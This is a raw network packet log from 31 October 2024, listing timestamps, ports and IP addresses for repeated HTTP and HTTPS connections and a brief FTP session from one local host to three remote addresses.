Oct 31, 2024 10:37:30.726598978 CET	49711	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:30.726613045 CET	443	49711	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:30.726964951 CET	443	49711	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:30.783056974 CET	49711	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:30.821239948 CET	49711	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:30.863338947 CET	443	49711	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:30.960324049 CET	443	49711	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:30.960418940 CET	443	49711	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:30.960462093 CET	49711	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:30.989077091 CET	49711	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:30.993073940 CET	49709	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:30.998223066 CET	80	49709	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:31.220458984 CET	80	49709	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:31.224097967 CET	49712	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:31.224148035 CET	443	49712	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:31.224812984 CET	49712	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:31.225008965 CET	49712	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:31.225020885 CET	443	49712	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:31.267462969 CET	49709	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:31.831263065 CET	443	49712	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:31.834614038 CET	49712	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:31.834640980 CET	443	49712	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:31.970608950 CET	443	49712	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:31.970725060 CET	443	49712	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:31.971060038 CET	49712	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:31.971417904 CET	49712	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:31.974689007 CET	49709	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:31.976007938 CET	49713	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:31.982172966 CET	80	49713	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:31.982322931 CET	49713	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:31.982398987 CET	49713	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:31.983267069 CET	80	49709	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:31.983330011 CET	49709	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:31.987272024 CET	80	49713	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:32.663136005 CET	80	49713	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:32.664576054 CET	49714	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:32.664623022 CET	443	49714	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:32.664748907 CET	49714	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:32.664984941 CET	49714	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:32.665003061 CET	443	49714	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:32.704929113 CET	49713	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:33.270597935 CET	443	49714	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:33.272325039 CET	49714	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:33.272342920 CET	443	49714	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:33.409652948 CET	443	49714	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:33.409756899 CET	443	49714	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:33.409944057 CET	49714	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:33.410408020 CET	49714	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:33.415081024 CET	49715	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:33.420181036 CET	80	49715	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:33.420371056 CET	49715	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:33.420371056 CET	49715	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:33.425265074 CET	80	49715	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:34.087682962 CET	80	49715	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:34.089230061 CET	49716	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:34.089265108 CET	443	49716	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:34.089361906 CET	49716	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:34.089662075 CET	49716	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:34.089673996 CET	443	49716	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:34.142462015 CET	49715	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:34.701029062 CET	443	49716	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:34.703015089 CET	49716	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:34.703046083 CET	443	49716	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:34.840615988 CET	443	49716	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:34.840735912 CET	443	49716	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:34.840877056 CET	49716	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:34.841298103 CET	49716	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:34.844733953 CET	49715	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:34.845911980 CET	49717	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:34.849904060 CET	80	49715	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:34.849953890 CET	49715	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:34.850687981 CET	80	49717	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:34.850759029 CET	49717	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:34.850861073 CET	49717	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:34.855581045 CET	80	49717	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:35.514245987 CET	80	49717	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:35.564362049 CET	49717	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:35.578200102 CET	49718	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:35.578244925 CET	443	49718	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:35.578327894 CET	49718	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:35.579099894 CET	49718	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:35.579117060 CET	443	49718	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:35.834572077 CET	49719	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:35.839596033 CET	80	49719	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:35.842032909 CET	49719	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:35.842900991 CET	49719	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:35.847704887 CET	80	49719	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:36.190651894 CET	443	49718	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:36.193952084 CET	49718	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:36.193988085 CET	443	49718	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:36.342986107 CET	443	49718	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:36.343096018 CET	443	49718	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:36.343142986 CET	49718	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:36.343792915 CET	49718	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:36.347543955 CET	49717	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:36.348668098 CET	49720	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:36.352832079 CET	80	49717	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:36.352888107 CET	49717	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:36.353513002 CET	80	49720	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:36.353583097 CET	49720	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:36.353669882 CET	49720	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:36.358510971 CET	80	49720	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:36.533608913 CET	80	49719	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:36.537703037 CET	49719	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:36.542700052 CET	80	49719	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:36.700730085 CET	80	49719	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:36.751825094 CET	49719	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:36.935898066 CET	49721	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:36.935942888 CET	443	49721	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:36.936037064 CET	49721	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:36.941051960 CET	49721	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:36.941065073 CET	443	49721	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.006655931 CET	80	49720	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:37.008028030 CET	49722	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.008073092 CET	443	49722	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.008160114 CET	49722	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.008495092 CET	49722	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.008505106 CET	443	49722	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.048743010 CET	49720	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:37.555759907 CET	443	49721	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.555840015 CET	49721	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.557681084 CET	49721	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.557691097 CET	443	49721	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.557965040 CET	443	49721	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.608191967 CET	49721	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.613792896 CET	443	49722	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.615467072 CET	49722	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.615494013 CET	443	49722	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.651329041 CET	443	49721	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.747255087 CET	443	49721	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.747358084 CET	443	49721	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.747514009 CET	49721	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.750272989 CET	49721	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.750674963 CET	443	49722	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.750778913 CET	443	49722	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.750829935 CET	49722	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.751214027 CET	49722	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.754362106 CET	49720	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:37.754631996 CET	49719	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:37.755671024 CET	49723	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:37.759592056 CET	80	49719	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:37.759643078 CET	80	49720	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:37.759687901 CET	49720	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:37.760549068 CET	80	49723	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:37.760610104 CET	49723	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:37.760721922 CET	49723	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:37.765474081 CET	80	49723	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:37.920953989 CET	80	49719	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:37.922832012 CET	49724	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.922873974 CET	443	49724	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.923541069 CET	49724	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.923938036 CET	49724	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:37.923949003 CET	443	49724	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:37.986202002 CET	49719	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:38.449312925 CET	80	49723	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:38.450711012 CET	49725	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:38.450763941 CET	443	49725	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:38.450881004 CET	49725	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:38.451153994 CET	49725	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:38.451165915 CET	443	49725	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:38.501818895 CET	49723	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:38.530920982 CET	443	49724	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:38.533091068 CET	49724	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:38.533107996 CET	443	49724	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:38.676889896 CET	443	49724	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:38.676997900 CET	443	49724	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:38.678047895 CET	49724	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:38.685493946 CET	49724	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:38.688729048 CET	49719	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:38.689924955 CET	49726	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:38.694065094 CET	80	49719	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:38.694134951 CET	49719	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:38.694801092 CET	80	49726	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:38.694905043 CET	49726	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:38.694971085 CET	49726	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:38.699757099 CET	80	49726	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:39.063177109 CET	443	49725	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:39.064918995 CET	49725	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:39.064943075 CET	443	49725	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:39.213392019 CET	443	49725	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:39.213496923 CET	443	49725	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:39.213550091 CET	49725	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:39.214123964 CET	49725	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:39.217133045 CET	49723	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:39.218173027 CET	49727	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:39.222526073 CET	80	49723	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:39.222594023 CET	49723	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:39.223104000 CET	80	49727	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:39.223166943 CET	49727	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:39.223305941 CET	49727	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:39.228293896 CET	80	49727	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:39.348088026 CET	80	49726	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:39.361670017 CET	49728	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:39.361718893 CET	443	49728	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:39.361802101 CET	49728	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:39.362395048 CET	49728	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:39.362406969 CET	443	49728	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:39.392474890 CET	49726	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:39.894350052 CET	80	49727	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:39.895848036 CET	49731	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:39.895894051 CET	443	49731	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:39.896023989 CET	49731	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:39.896240950 CET	49731	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:39.896265984 CET	443	49731	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:39.939382076 CET	49727	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:39.959894896 CET	443	49728	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:39.962141037 CET	49728	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:39.962161064 CET	443	49728	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:40.102854967 CET	443	49728	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:40.102950096 CET	443	49728	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:40.103349924 CET	49728	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:40.104033947 CET	49728	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:40.108462095 CET	49732	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:40.113435030 CET	80	49732	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:40.114032984 CET	49732	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:40.114207029 CET	49732	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:40.118988991 CET	80	49732	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:40.504637003 CET	443	49731	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:40.506742001 CET	49731	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:40.506772041 CET	443	49731	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:40.647681952 CET	443	49731	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:40.647809982 CET	443	49731	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:40.647914886 CET	49731	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:40.648356915 CET	49731	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:40.768721104 CET	80	49732	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:40.770622969 CET	49734	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:40.770674944 CET	443	49734	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:40.770730019 CET	49734	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:40.771070957 CET	49734	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:40.771083117 CET	443	49734	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:40.814363003 CET	49732	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:41.378422976 CET	443	49734	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:41.380103111 CET	49734	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:41.380124092 CET	443	49734	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:41.674583912 CET	443	49734	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:41.674700022 CET	443	49734	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:41.674834967 CET	49734	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:41.675990105 CET	49734	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:41.682069063 CET	49732	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:41.682737112 CET	49735	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:41.688750982 CET	80	49735	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:41.688766003 CET	80	49732	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:41.688874006 CET	49732	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:41.689002037 CET	49735	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:41.689124107 CET	49735	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:41.694015026 CET	80	49735	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:42.369683981 CET	80	49735	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:42.370898962 CET	49737	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:42.370938063 CET	443	49737	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:42.371016026 CET	49737	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:42.371249914 CET	49737	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:42.371263027 CET	443	49737	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:42.423711061 CET	49735	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:42.971250057 CET	443	49737	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:43.017477036 CET	49737	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:43.318437099 CET	49737	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:43.318478107 CET	443	49737	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:43.451527119 CET	443	49737	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:43.451632977 CET	443	49737	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:43.451675892 CET	49737	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:43.452238083 CET	49737	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:43.458353043 CET	49735	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:43.459634066 CET	49738	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:43.463664055 CET	80	49735	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:43.463717937 CET	49735	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:43.464425087 CET	80	49738	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:43.464502096 CET	49738	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:43.464862108 CET	49738	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:43.469681978 CET	80	49738	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:44.125128984 CET	80	49738	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:44.126671076 CET	49739	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:44.126718044 CET	443	49739	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:44.126858950 CET	49739	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:44.127141953 CET	49739	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:44.127154112 CET	443	49739	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:44.173702955 CET	49738	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:44.740350962 CET	443	49739	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:44.742441893 CET	49739	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:44.742476940 CET	443	49739	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:44.886745930 CET	443	49739	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:44.886848927 CET	443	49739	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:44.886955976 CET	49739	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:44.890130043 CET	49739	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:44.894908905 CET	49738	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:44.895984888 CET	55432	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:44.900417089 CET	80	49738	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:44.901994944 CET	80	55432	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:44.902185917 CET	49738	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:44.902266026 CET	55432	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:44.902343988 CET	55432	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:44.907298088 CET	80	55432	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:45.667161942 CET	80	55432	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:45.720685959 CET	55432	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:45.872692108 CET	55433	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:45.872740030 CET	443	55433	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:45.872828007 CET	55433	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:45.873310089 CET	55433	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:45.873322964 CET	443	55433	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:46.089026928 CET	49727	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:46.089915991 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:46.094561100 CET	80	49727	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:46.094669104 CET	49727	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:46.094728947 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:46.094810963 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:46.492022991 CET	443	55433	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:46.495006084 CET	55433	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:46.495027065 CET	443	55433	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:46.618531942 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:46.623420954 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:46.629182100 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:46.637414932 CET	443	55433	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:46.637598038 CET	443	55433	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:46.637662888 CET	55433	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:46.638169050 CET	55433	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:46.641511917 CET	55432	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:46.642865896 CET	55435	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:46.647150040 CET	80	55432	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:46.647268057 CET	55432	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:46.647739887 CET	80	55435	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:46.647819996 CET	55435	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:46.647955894 CET	55435	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:46.653009892 CET	80	55435	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:46.771356106 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:46.771560907 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:46.776738882 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.045485973 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.045754910 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:47.050734997 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.191927910 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.192096949 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:47.197021008 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.319080114 CET	80	55435	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:47.320729971 CET	55436	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:47.320775032 CET	443	55436	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:47.320914030 CET	55436	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:47.321960926 CET	55436	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:47.321984053 CET	443	55436	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:47.337635994 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.337933064 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:47.342773914 CET	21	55434	50.31.176.103	192.168.2.8
